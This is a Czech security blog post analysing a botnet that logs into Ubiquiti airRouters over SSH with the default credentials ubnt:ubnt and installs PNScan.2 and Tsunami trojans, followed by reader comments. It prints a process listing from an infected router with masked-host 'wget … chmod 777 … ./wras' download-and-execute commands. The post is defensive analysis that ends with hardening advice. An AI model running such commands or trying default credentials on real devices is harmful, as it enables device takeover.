Hlavní navigace

Nenechavý router botnet útočí na Ubiquiti airRouter

Ondrej Mikle

Poslední dva týdny se nám do SSH honeypotu provozovaného na routerech Turris nejvíce pokouší přihlašovat botnet, jehož IP adresy mají podle Shodanu často jednu společnou vlastnost: na portu 80 odpovídá AirOS bežící na Ubiquiti airRouter. Po úspěšném přihlášení se do routeru instaluje malware.

Není to tak dlouho, co jsme na základě sledování útočníků v našich telnetových honeypotech odhalili zajímavý botnet složený z domácích routerů značky ASUS. Poslední dva týdny se nám do SSH honeypotu provozovaného na routerech Turris zase nejvíce pokouší přihlašovat botnet, jehož IP adresy mají podle Shodanu často jednu společnou vlastnost: na portu 80 odpovídají s cookie  AIROS_SESSIONID.

Tato cookie ukazuje na AirOS bežící na Ubiquiti airRouter. Podle dat ze Shodanu lze touto cookie identifikovat asi 20 % útočících IP adres z celkových cca 6 500 jako AirOS. Mnoho adres ale bývá z dynamických poolů, o kterých Shodan ještě neví.

Botnet velmi rád používá na přihlašování kombinaci jména a hesla ubnt:ubnt (tuto kombinaci nemáme běžně povolenou na SSH honeypotu a neúspěšné pokusy o přihlášení se na webu neukazují). Je to výchozí kombinace právě pro airRouter a evidentně je stále dost kusů, které nemají výchozí nastavení změněno. Navíc SSH port je dostupný z internetu.

Jeden airRouter jsme si tedy koupili a sledovali, co se stane. Než se útočníci pokusili do routeru přihlásit, uplynulo jenom pár minut. Bylo to, jako vrátit se 10 let zpátky do doby, kdy byl rozšířený červ Sasser. V době jeho největší slávy byly Windows napadeny dříve, než se provedly aktualizace (obejít to šlo jen offline instalací a offline patchem).

Vzorek malware je vzhledem k jeho hlučnosti dost známý – jedná se o PNScan.2, který se botnet pokouší šířit dál. Krátce po instalaci začne napadání dalších strojů. Soubory se seznamem IP adres k útoku se vyznačují tím, že jsou „předscanovány“, tj. útočníci už vědí, že na cílových strojích běží SSH.

Při delším čekání přibudou procesy dalších trojanů postahované od PNScan, většina běžících procesů patří malware:

  PID USER       VSZ STAT COMMAND
  [...]
  902 ubnt       812 R    /usr/bin/
 1005 ubnt       272 S    /usr
 1209 ubnt      3632 S    /tmp/.xs/daemon.mips.mod
 1210 ubnt      3632 S    /tmp/.xs/daemon.mips.mod
 1211 ubnt      3632 S    /tmp/.xs/daemon.mips.mod
 1212 ubnt      3632 S    /tmp/.xs/daemon.mips.mod
 1213 ubnt      3632 S    /tmp/.xs/daemon.mips.mod
 1236 ubnt      1972 S    sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras;
 1239 ubnt      3564 S    ./wras
 1240 ubnt      3564 S    ./wras
 1241 ubnt      3564 S    ./wras
 1248 ubnt      1972 S    sh -c wget -c http://x.x.x.x/hsde;chmod 777 hsde;./hsde;
 1251 ubnt      3564 S    ./hsde
 1252 ubnt      3564 S    ./hsde
 1253 ubnt      3564 S    ./hsde
 1292 ubnt      1972 S    sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras;
 1295 ubnt      3564 S    ./wras
 1296 ubnt      3564 S    ./wras
 1297 ubnt      3564 S    ./wras
 1302 ubnt      1972 S    sh -c wget -c http://x.x.x.x/hsde;chmod 777 hsde;./hsde;
 1305 ubnt      3564 S    ./hsde
 1306 ubnt      3564 S    ./hsde
 1307 ubnt      3564 S    ./hsde
 1368 ubnt      1972 S    sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras;
 1371 ubnt      3564 S    ./wras
 1372 ubnt      3564 S    ./wras
 1373 ubnt      3564 S    ./wras
 1427 ubnt       816 S    /usr/bin/
 [...]

Méně obvyklé procesy trojanů zobrazované jako „ /usr “ a „ /usr/bin “ patří trojanu Tsunami. Toto skrývání se dělá obyčejnou změnou argv[0] a je zarážející, proč si útočník nevybral změnu o něco méně nápadnou. Závěr ale není příliš překvapivý: zranitelné zařízení moc dlouho netknuté na internetu nevydrží.

Pokud tedy tento router vlastníte, zkuste se podívat, co všechno na něm běží za procesy. A pokud si ho hodláte pořídit, doporučujeme ho nejprve nastavit bez připojení do internetu, nastavit silné heslo a pokud ho opravdu nepotřebujete, vypnout SSH server pro spojení z internetu.

Článek původně vyšel na blogu CZ.NIC.

Našli jste v článku chybu?

16. 9. 2015 15:41

fe (neregistrovaný)

Hlavně by si to měli přečíst poskytovatelé Internetu, kteří zákazníkovi dodají zamčený AP (případně zamknou AP vlastněný zákazníkem) a nestarají se o aktualizace firmware a myslí si, že je to OK. V poslední době se s takovýmito poskytovateli setkávám čím dál častěji – bohužel.

21. 9. 2015 11:18

Náš poskytovatel to dělal - při trafficu odpovídajícím nějaké havěti zablokoval dotyčnému přístup na http a přesměroval ho na informaci o tom, že je zavirován a že mu web nepojede, dokud to nevyřeší. Jestli to ještě dělá, nevím, já ještě neměl tu čest se do zavirovaného stavu dostat, musel bych se ho zeptat.

Lupa.cz: Insolvenční řízení kvůli cookies? Vítejte v ČR

Insolvenční řízení kvůli cookies? Vítejte v ČR

120na80.cz: 5 nejčastějších mýtů o kondomech

5 nejčastějších mýtů o kondomech

Vitalia.cz: Vychytané vály a válečky na vánoční cukroví

Vychytané vály a válečky na vánoční cukroví

DigiZone.cz: ČRo rozšiřuje DAB do Berouna

ČRo rozšiřuje DAB do Berouna

Vitalia.cz: Proč vás každý zubař posílá na dentální hygienu

Proč vás každý zubař posílá na dentální hygienu

Podnikatel.cz: K EET. Štamgast už peníze na stole nenechá

K EET. Štamgast už peníze na stole nenechá

Podnikatel.cz: Chaos u EET pokračuje. Jsou tu další návrhy

Chaos u EET pokračuje. Jsou tu další návrhy

Lupa.cz: Propustili je z Avastu, už po nich sahá ESET

Propustili je z Avastu, už po nich sahá ESET

Vitalia.cz: Když přijdete o oko, přijdete na rok o řidičák

Když přijdete o oko, přijdete na rok o řidičák

Vitalia.cz: Spor o mortadelu: podle Lidlu falšovaná nebyla

Spor o mortadelu: podle Lidlu falšovaná nebyla

Měšec.cz: Air Bank zruší TOP3 garanci a zdražuje kurzy

Air Bank zruší TOP3 garanci a zdražuje kurzy

Vitalia.cz: Jsou čajové sáčky toxické?

Jsou čajové sáčky toxické?

Podnikatel.cz: Chtějte údaje k dani z nemovitostí do mailu

Chtějte údaje k dani z nemovitostí do mailu

Podnikatel.cz: Udávání a účtenková loterie, hloupá komedie

Udávání a účtenková loterie, hloupá komedie

Vitalia.cz: Taky věříte na pravidlo 5 sekund?

Taky věříte na pravidlo 5 sekund?

Podnikatel.cz: Snížení DPH na 15 % se netýká všech

Snížení DPH na 15 % se netýká všech

120na80.cz: Horní cesty dýchací. Zkuste fytofarmaka

Horní cesty dýchací. Zkuste fytofarmaka

Podnikatel.cz: Udávání kvůli EET začalo

Udávání kvůli EET začalo

Vitalia.cz: Mondelez stahuje rizikovou čokoládu Milka

Mondelez stahuje rizikovou čokoládu Milka

Lupa.cz: Teletext je „internetem hipsterů“

Teletext je „internetem hipsterů“